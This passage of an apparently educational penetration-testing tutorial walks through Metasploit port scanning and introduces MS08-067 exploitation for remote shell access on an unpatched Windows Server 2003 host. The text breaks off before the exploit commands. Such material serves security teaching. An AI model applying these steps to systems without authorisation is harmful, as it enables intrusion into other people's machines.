<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW3.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW3.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The Metasploit has a couple port scanning exploits and offers several scanning methods, especially SYN, XMAS, and ACK scan. Therefore, we move ahead with the SYN scanning method. So, choose the port scanning exploit with the <em>use</em>command as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_537939" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > use scanner/portscan/syn</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Every exploit has specific options or parameters which can be displayed by the <em>show options</em> command as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_663155" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > show options</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The show options method displays a couple of corresponding exploit parameters, but we are only interested in the RHOSTS and THREAD option, which asks the target computer IP address and number of threads to be run as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW4.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW4.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Finally, launch the port scanning exploit using run command as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_834624" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > run</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Note that this exploit requires the <em>pcaprub</em> module to be installed first in the Metasploit in order to scan the open port on the target computer. We can configure this as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW5.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW5.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Finally, run the exploit using the run command and it shall produce the list of open ports on the target computer as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW6.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW6.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 16pt;"><strong>Exploiting Vulnerability</strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The exploit will only execute while the target host has a vulnerability which still remains unpatched. Metasploit isn’t particularly suited for telling you what vulnerabilities a host has. Hence you would have to use a particular <em>vulnerability scanner</em>. Alternately, if your <em>port scanner </em>shows a particular port open, you can try all exploits for that particular port and see whether any one is successful carried out or not.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The forthcoming demonstration regarding accessing the remote shell involves exploiting the common MS08-067vulnerability, especially found on Windows Server 2003 and Windows XP operating system. We’ll use Metasploit to get a remote command shell running on the unpatched Windows Server 2003 machine. Metasploit can pair any Windows exploit with any Windows payload such as <em>bind</em> or <em>reverse tcp</em>. So, we can choose the MS08-067 vulnerability to exploit or open a command shell as well as create an administrator account or start a remote VNC session on the victim computer. This vulnerability can be protected from hackers by patching the operating system, or by enabling a firewall to filter unwanted traffic and having installed an anti-virus with the latest signatures.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 16pt;"><strong>Remote Shell Access</strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
We shall exploit the SMB (port 445) vulnerability of the target computer where Windows 2003 Server is running. There are numerous ways to access the Reverse shell (DOS command prompt) of the target, but we shall encounter with <em>msfconsole</em>and <em>msfcli</em> to achieve the objective.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 13pt;"><strong><em>Msfconsole</em></strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
First open the <em>msfconsole</em>. To access “<em>msfconsole</em>“, go to <strong>Backtrack | Exploitation Tools | Network Exploitation Tools | Metasploit Framework| Msfconsole </strong>or use the terminal to execute the following commands:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_13158" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
<div class="line number2 index1 alt1" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
2</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># cd /pentest/exploits/framework3/</code></div>
<div class="line number2 index1 alt1" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># ./msfconsole</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Thereafter, it is mandatory to have comprehensive information about a particular exploit, e.g. its full name, which is in fact a complex task. So, there is another way to get rid of this problem. As we know, we are exploiting the SMB port vulnerability, so it is obvious to have an SMB related exploit in our pocket. The best way is to search the exploit with the SMB keyword as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_578888" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
